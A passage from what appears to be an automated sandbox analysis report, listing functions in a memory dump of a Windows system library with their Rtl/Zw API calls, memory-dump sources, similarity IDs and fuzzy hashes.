                                                                                                                            • LdrQueryImageFileKeyOption.1105(?,?,00000004,?,00000004,?,?,?,00000000), ref: 6B2306A6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFileImageInitOpenOptionQueryStringUnicode
                                                                                                                            • String ID: \DllNXOptions
                                                                                                                            • API String ID: 166309601-742623237
                                                                                                                            • Opcode ID: 257041fb67f51ef09355b3a17fcccaefd4e1822146848df23987807d5bf60d6b
                                                                                                                            • Instruction ID: 4aa67398c92abb5981a3c4d1ec113e93b84a2ac01a165bb0838537af79cf536c
                                                                                                                            • Opcode Fuzzy Hash: 257041fb67f51ef09355b3a17fcccaefd4e1822146848df23987807d5bf60d6b
                                                                                                                            • Instruction Fuzzy Hash: 8801AC7590012D7BDB11DA659D45E9F77FCEB85725F1040A6EA08EB240D7349E0186F4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DF4E3, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.1105(6B2C7B60,00000000,6B1E08CF,?,?,?,?,?,?,6B230AF4,?), ref: 6B1DF4FC
                                                                                                                            • RtlLeaveCriticalSection.1105(6B2C7B60,6B2C7B60,00000000,6B1E08CF,?,?,?,?,?,?,6B230AF4,?), ref: 6B1DF509
                                                                                                                            • ZwSetEvent.1105(00000000,6B2C7B60,6B2C7B60,00000000,6B1E08CF,?,?,?,?,?,?,6B230AF4,?), ref: 6B1DF516
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterEventLeave
                                                                                                                            • String ID: `{,k
                                                                                                                            • API String ID: 3094578987-2711059664
                                                                                                                            • Opcode ID: 7b67cb1f156420a4a5a60e5fb764aa18c27cdb4a667609f0517c144bfe31659b
                                                                                                                            • Instruction ID: 106bb2060795d72caccbda4434c6e84ebcf923e790ab7603387a1cb592b4875e
                                                                                                                            • Opcode Fuzzy Hash: 7b67cb1f156420a4a5a60e5fb764aa18c27cdb4a667609f0517c144bfe31659b
                                                                                                                            • Instruction Fuzzy Hash: 16D0A733A61629B7DFA05731DC85FE532D4AF06324F100870E604329A94B3CB982C2AC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1E8800, Relevance: 6.2, APIs: 4, Instructions: 179COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcmp.1105(6B2C84DC,6B1B1184,00000010,-00000054,?,00000000,00000001,?,6B2C52D8), ref: 6B1E88A8
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C86CC,-00000054,?,00000000,00000001,?,6B2C52D8), ref: 6B1E8901
                                                                                                                            • RtlReleaseSRWLockExclusive.1105(6B2C86CC,6B2C86CC,-00000054,?,00000000,00000001,?,6B2C52D8), ref: 6B1E8933
                                                                                                                            • RtlAcquireSRWLockExclusive.1105(6B2C86CC,-00000054,?,00000000,00000001,?,6B2C52D8), ref: 6B239C65
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$Acquire$Releasememcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2792186644-0
                                                                                                                            • Opcode ID: 03410cd7c37ebd2ba5372f75263fb10a53690c3ff20705c828bcff1214e59396
                                                                                                                            • Instruction ID: d04debb15e689128f238d4d1c0c19f4fed2ae122a49a2787ae1dc31b0acf6c9f
                                                                                                                            • Opcode Fuzzy Hash: 03410cd7c37ebd2ba5372f75263fb10a53690c3ff20705c828bcff1214e59396
                                                                                                                            • Instruction Fuzzy Hash: 92510670E10A0AEFDF08CF58C4C1AAA73F1FF85305F1541A9DD06AB145DB38AA42CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B29B581, Relevance: 6.2, APIs: 4, Instructions: 163nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,6B22FC28), ref: 6B29B6C4
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,6B22FC28), ref: 6B29B6F0
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B29B726
                                                                                                                            • ZwTraceEvent.1105(?,00000402,00000004,?), ref: 6B29B75E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession$EventTrace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4061387822-0
                                                                                                                            • Opcode ID: 389023fce80d143c67a3bbbdd4e2d35ed9c587eb39ae3684b0b81dbe30a2dc8f
                                                                                                                            • Instruction ID: 3179aa3b4e5c642b54ac5d37cbb9c62843d8cfc4b56973d6ffa74c4b8c504929
                                                                                                                            • Opcode Fuzzy Hash: 389023fce80d143c67a3bbbdd4e2d35ed9c587eb39ae3684b0b81dbe30a2dc8f
                                                                                                                            • Instruction Fuzzy Hash: 7851063161474A8BD301EF3AD5D9B66B7E4FF85B09F0405ADE9588B290DB3DE805C781
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D1AA0, Relevance: 6.1, APIs: 4, Instructions: 123memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlReAllocateHeap.1105(?,00000008,00000000,?,00000000,?,?,00000000,C0000017), ref: 6B1D1B1E
                                                                                                                            • ZwAllocateVirtualMemory.1105(000000FF,?,00000000,?,00002000,00000004,00000000,?,?,00000000,C0000017,?,?,6B1D16E0), ref: 6B1D1B83
                                                                                                                            • ZwAllocateVirtualMemory.1105(000000FF,6B1D16E0,00000000,C0000017,00001000,00000004,00000000,?,?,00000000,C0000017,?,?,6B1D16E0), ref: 6B1D1BBD
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,?,00000000,?,?,00000000,C0000017), ref: 6B1D1BD8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Allocate$HeapMemoryVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1343662020-0
                                                                                                                            • Opcode ID: ff884249f956a76cbe8466050f7d8afdfb7191b031ec1569717d03b17d0e24ed
                                                                                                                            • Instruction ID: 31bd05cf51e766c9e0d038901db28076ac980e3d50b1da1c550e683ceb62fd64
                                                                                                                            • Opcode Fuzzy Hash: ff884249f956a76cbe8466050f7d8afdfb7191b031ec1569717d03b17d0e24ed
                                                                                                                            • Instruction Fuzzy Hash: 93416071A04619EFDB24CFA9C980E9AB7F9FF18700B1046ADE556D7650E334EA14CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DF018, Relevance: 6.1, APIs: 4, Instructions: 95memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,?,?,00000000,?), ref: 6B1DF05B
                                                                                                                            • ZwQueryValueKey.1105(?,?,00000002,00000000,?,00000000,?,00000008,?,?,00000000,?), ref: 6B1DF07A
                                                                                                                            • memcpy.1105(00000000,0000000C,?,?,?,00000002,00000000,?,00000000,?,00000008,?,?,00000000,?), ref: 6B1DF0AB
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,?,?,00000002,00000000,?,00000000,?,00000008,?,?,00000000,?), ref: 6B1DF0CB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateFreeQueryValuememcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 125101864-0
                                                                                                                            • Opcode ID: 505cdb4590f4c2fa0a685607fb8905ed14938dcd0161c7b296e56ef626f41d17
                                                                                                                            • Instruction ID: e2152bb3f1e64cb8ca1ee930b4b2b8c7e03192264264989e83c7b8ba2b95d3b5
                                                                                                                            • Opcode Fuzzy Hash: 505cdb4590f4c2fa0a685607fb8905ed14938dcd0161c7b296e56ef626f41d17
                                                                                                                            • Instruction Fuzzy Hash: 9531F772600548BFEB11CE58C980F5A73FADB44756F2188A9ED289B240D33CDE41CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D6730, Relevance: 6.1, APIs: 4, Instructions: 92timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B1D674F
                                                                                                                            • RtlGetCurrentServiceSessionId.1105(00000001), ref: 6B1D677C
                                                                                                                            • RtlDebugPrintTimes.1105(?,?,?,?,00000001), ref: 6B1D67B1
                                                                                                                            • RtlGetCurrentServiceSessionId.1105 ref: 6B1D67B9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentServiceSession$DebugPrintTimes
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 286911700-0
                                                                                                                            • Opcode ID: 1fa9b3d7dfe04cd8b60d88ca6939579646f29ddf87b0c4724c5b58e61900d8ab
                                                                                                                            • Instruction ID: 061b9a0037ab88c3e03236ec4d93fb07c7b40d7725db36bd3fe54b2f7ad5ef3b
                                                                                                                            • Opcode Fuzzy Hash: 1fa9b3d7dfe04cd8b60d88ca6939579646f29ddf87b0c4724c5b58e61900d8ab
                                                                                                                            • Instruction Fuzzy Hash: EC31CF35615A5EBFCB019F34CA85E8ABBE6FF85715F405065E80087BA4DB39E830CB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B201DB5, Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlQueryInformationActivationContext.1105(-40000003,?,00000000,00000006,00000000,00000000,00000000,00000000,?,?,?,00000040,-00000054,00000000), ref: 6B201DF7
                                                                                                                            • RtlQueryInformationActivationContext.1105(-40000003,-00000054,00000000,00000006,00000000,00000000,00000000,-40000003,?,00000000,00000006,00000000,00000000,00000000,00000000,?), ref: 6B201E36
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ActivationContextInformationQuery
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2130846384-0
                                                                                                                            • Opcode ID: 39ad629a20701d3ed16c14f322ca06b3d590f6998de82038df02d262996ece3b
                                                                                                                            • Instruction ID: d82df35cba463bdeabc49d94589bbfb03592abb0d8c8f1fd41103d7749f7ea09
                                                                                                                            • Opcode Fuzzy Hash: 39ad629a20701d3ed16c14f322ca06b3d590f6998de82038df02d262996ece3b
                                                                                                                            • Instruction Fuzzy Hash: 1F218071A4022DEBD715CF99C880E9FBBFDEF9564AF114065F90097250DB38AE82C790
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2AF1B5, Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,-0000000B,00000002,00000001,00000000,6B20FE70,00000000), ref: 6B2AF1EC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 07c63c7cd94c1385345829398efe3b2dcad23e0f197948bbad8894b9bc5c33bb
                                                                                                                            • Instruction ID: fde46d31e19c020e424fb3c252e268ad95083edbdfed4cb0b9331e3b6c8afce9
                                                                                                                            • Opcode Fuzzy Hash: 07c63c7cd94c1385345829398efe3b2dcad23e0f197948bbad8894b9bc5c33bb
                                                                                                                            • Instruction Fuzzy Hash: 5B21A17AA00519ABEB118F59C8D4F4BBBF8EF46751F0141A5E914DB250D73C9D10CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B203B7A, Relevance: 6.1, APIs: 4, Instructions: 75memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,?,?,?,7FFE03C0,7FFE03C0,?), ref: 6B203BB0
                                                                                                                            • ZwQuerySystemInformationEx.1105(0000006B,00000001,00000004,00000000,?,?,?,?,?,?,7FFE03C0,7FFE03C0,?), ref: 6B203BCF
                                                                                                                            • memset.1105(6B2443AB,00000000,?,0000006B,00000001,00000004,00000000,?,?,?,?,?,?,7FFE03C0,7FFE03C0,?), ref: 6B203BEA
                                                                                                                            • RtlFreeHeap.1105(?,?,00000000,0000006B,00000001,00000004,00000000,?,?,?,?,?,?,7FFE03C0,7FFE03C0,?), ref: 6B203C30
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocateFreeInformationQuerySystemmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 21860560-0
                                                                                                                            • Opcode ID: a5f5bf97a4015b1b41d3a8ea1f16aa3a76e323df909bfc51dfb3e9c980cc9763
                                                                                                                            • Instruction ID: 93a590a872137f5469e359e49771041021565da384bce4ca344081e8f3ae873d
                                                                                                                            • Opcode Fuzzy Hash: a5f5bf97a4015b1b41d3a8ea1f16aa3a76e323df909bfc51dfb3e9c980cc9763
                                                                                                                            • Instruction Fuzzy Hash: AC21AC72A40508AFCB11CF98CD81FAAB7FDFB45708F1501A9EA08AB251D775ED01CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2018B9, Relevance: 6.1, APIs: 4, Instructions: 75nativetimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwCreateTimer2.1105(00000058,00000000,00000000,00000008,00100002,00000040,00000000,00000000), ref: 6B2018E6
                                                                                                                            • ZwCreateWaitCompletionPacket.1105(0000005C,00000001,00000000,00000058,00000000,00000000,00000008,00100002,00000040,00000000,00000000), ref: 6B2018F6
                                                                                                                            • ZwAssociateWaitCompletionPacket.1105(?,00000000,00000058,00000060,?,00000000,?,?,0000005C,00000001,00000000,00000058,00000000,00000000,00000008,00100002), ref: 6B201926
                                                                                                                            • ZwClose.1105(00000058,0000005C,00000001,00000000,00000058,00000000,00000000,00000008,00100002,00000040,00000000,00000000), ref: 6B245690
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CompletionCreatePacketWait$AssociateCloseTimer2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 56835937-0
                                                                                                                            • Opcode ID: 086ad5c25012071c8a9f73f07abeb0dcda0c775c3770745cbbd3ff75100fd114
                                                                                                                            • Instruction ID: fa5174842452efd4244729d64ad2c6f3591e57e97e56df0047a4eee667d28e0f
                                                                                                                            • Opcode Fuzzy Hash: 086ad5c25012071c8a9f73f07abeb0dcda0c775c3770745cbbd3ff75100fd114
                                                                                                                            • Instruction Fuzzy Hash: 8F2131B1500209BFD700CF69C8C1E96BBF8FF49358F10856AE65497241D775A966CFA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B266652, Relevance: 6.1, APIs: 4, Instructions: 74memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwClose.1105(00000000,00000000,00000000,00000000,?,?,6B24B381,00000001,6B2C861C,6B2B0268,00000020,6B1EBE44,?,00000000,?,00000001), ref: 6B26668C
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,?,00000000,00000000,00000000,?,?,6B24B381,00000001,6B2C861C,6B2B0268,00000020,6B1EBE44,?,00000000), ref: 6B2666D0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateCloseHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3565931908-0
                                                                                                                            • Opcode ID: 87c55f34d5a5d952bd2548cd368a4ae37944bdd75afdaf298c997ad0e9e79984
                                                                                                                            • Instruction ID: 66b5179ccca236d436ebb31fbbcb511289aeb349287a6311f258c91447101b7d
                                                                                                                            • Opcode Fuzzy Hash: 87c55f34d5a5d952bd2548cd368a4ae37944bdd75afdaf298c997ad0e9e79984
                                                                                                                            • Instruction Fuzzy Hash: A52192B160465B6BD6074E6898C1791B7E4FB127AAF000355EC30935D1E77EE8E1C6E0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D4DC0, Relevance: 6.1, APIs: 4, Instructions: 73nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlWakeAddressAllNoFence.1105(00000000), ref: 6B1D4DE8
                                                                                                                            • RtlRaiseStatus.1105(00000000,?,?,?,6B1EEBD0,?,?,?,?,00000000,?,6B1D1E03,?,6B1D1D6E,?), ref: 6B1D4E04
                                                                                                                            • ZwAlpcQueryInformation.1105(?,0000000B,FFFFFFFE,00000004,00000000,00000000,000000FF,?,?,00000000,?,?,?,6B1EEBD0,?,?), ref: 6B230B73
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressAlpcFenceInformationQueryRaiseStatusWake
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3812654406-0
                                                                                                                            • Opcode ID: 5d5570f8a10cb7a806a67cbbe6a9f52131e3c8302fa82ec5a631861a7e33764d
                                                                                                                            • Instruction ID: 8c2d846d23f11ba06ec647c28b671828e65af6c5f2bfffb45ea697f181a8e2c0
                                                                                                                            • Opcode Fuzzy Hash: 5d5570f8a10cb7a806a67cbbe6a9f52131e3c8302fa82ec5a631861a7e33764d
                                                                                                                            • Instruction Fuzzy Hash: 5311E371600708BBEB14DB39CC82F9B73DD9F55718F11416AAA21D71C0EFBCEA0082A5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B268372, Relevance: 6.1, APIs: 4, Instructions: 72nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ZwClose.1105(00000000,?,00000000,00000000), ref: 6B26839C
                                                                                                                            • RtlStringFromGUIDEx.1105(?,?,00000001,?,00000000,00000000), ref: 6B2683B9
                                                                                                                            • ZwCreateKey.1105(?,?,00000018,00000000,00000000,00000000,00000001,?,?,00000001,?,00000000,00000000), ref: 6B2683F5
                                                                                                                            • RtlFreeUnicodeString.1105(?,?,?,00000018,00000000,00000000,00000000,00000001,?,?,00000001,?,00000000,00000000), ref: 6B268400
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: String$CloseCreateFreeFromUnicode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4294597832-0
                                                                                                                            • Opcode ID: 7b30807fec966089a536aa374a0853a9b2225c96b2993cecdc94418d57db9e43
                                                                                                                            • Instruction ID: 10a02cf535401dcc7f2477e78c4ca4a6a96d9fe8c95f0da5708426279372fa49
                                                                                                                            • Opcode Fuzzy Hash: 7b30807fec966089a536aa374a0853a9b2225c96b2993cecdc94418d57db9e43
                                                                                                                            • Instruction Fuzzy Hash: 17210EB1D0121DABDB15CFA5C8859EFB7F8EB09354F10416BE910F7240EB799D458BA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B213EE4, Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,00000028,?,?,6B238546), ref: 6B213F07
                                                                                                                            • RtlGetLocaleFileMappingAddress.1105(00000000,6B2C65D4,6B238546,?,00000008,00000028,?,?,6B238546), ref: 6B213F23
                                                                                                                              • Part of subcall function 6B213FA0: ZwInitializeNlsFiles.1105(00000028,00000008,?,?,?,00000000,?,6B213F28,00000000,6B2C65D4,6B238546,?,00000008,00000028,?), ref: 6B213FCD
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000000,6B2C65D4,6B238546,?,00000008,00000028,?,?,6B238546), ref: 6B24E7D3
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000000,6B2C65D4,6B238546,?,00000008,00000028,?,?,6B238546), ref: 6B24E7EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Free$AddressAllocateFileFilesInitializeLocaleMapping
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1831200515-0
                                                                                                                            • Opcode ID: 51296b754634e942e5360bc6767200487bb46ae876caa3d6000d7ec4aa96fd50
                                                                                                                            • Instruction ID: cc855ad60aceb08b3bac73fd6580f926e4c45dd2aa0551fc14a102b3641553e1
                                                                                                                            • Opcode Fuzzy Hash: 51296b754634e942e5360bc6767200487bb46ae876caa3d6000d7ec4aa96fd50
                                                                                                                            • Instruction Fuzzy Hash: 5821C139611605AFC724DF29C981B5677F5FF08708F2445A9E509CBB51E738E843CB94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D519E, Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B1D52A5: RtlEnterCriticalSection.1105(6B2C79A0,?,00000000,?), ref: 6B1D52BF
